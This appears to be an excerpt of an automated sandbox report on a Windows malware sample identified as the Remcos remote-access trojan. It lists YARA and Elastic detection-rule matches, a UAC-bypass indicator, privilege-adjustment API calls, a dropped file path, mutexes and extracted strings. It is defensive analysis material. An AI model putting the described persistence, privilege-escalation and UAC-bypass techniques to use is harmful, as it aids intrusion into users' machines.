Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: 2iH7rqx9rQ.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: yavascript.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@18/55@0/1

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	0_2_00416AB7
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: 0_2_02486D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	0_2_02486D1E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	23_2_00416AB7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 23_2_00AF6D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	23_2_00AF6D1E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	24_2_00416AB7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 24_2_02526D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	24_2_02526D1E
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	35_2_00416AB7
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: 35_2_024F6D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,	35_2_024F6D1E

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

0_2_0040E219

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,

0_2_0041A63F

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

Code function: 0_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

0_2_00419BC4

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe

File created: C:\Users\user\AppData\Roaming\xenor

Jump to behavior

Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Mutant created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7828
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7796
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2268

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\55963c11-e128-4b31-bd90-39f68414e7ee

Jump to behavior

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Software\	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Rmc-I7G983	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Exe	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Exe	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Rmc-I7G983	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: 0DG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Inj	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Inj	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: BG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: BG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: BG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: @CG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: BG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: exepath	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: @CG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: exepath	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: BG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: licence	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: `=G	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: XCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: dCG	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: Administrator	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: User	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: del	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: del	0_2_0040D767
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Command line argument: del	0_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Software\	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Rmc-I7G983	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Exe	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Exe	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Rmc-I7G983	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: 0DG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Inj	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Inj	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: @CG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: exepath	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: @CG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: exepath	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: licence	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: `=G	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: dCG	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Administrator	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: User	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	23_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Software\	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: (CG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Exe	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: (CG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: 0DG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Inj	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Inj	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: @CG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: exepath	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: @CG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: exepath	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: licence	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: `=G	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: dCG	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Administrator	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: User	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: del	24_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Software\	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: (CG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Exe	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: (CG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: 0DG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Inj	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: Inj	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: @CG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: exepath	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: @CG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: exepath	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: BG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: licence	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: XCG	35_2_0040D767
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Command line argument: `=G	35_2_0040D767
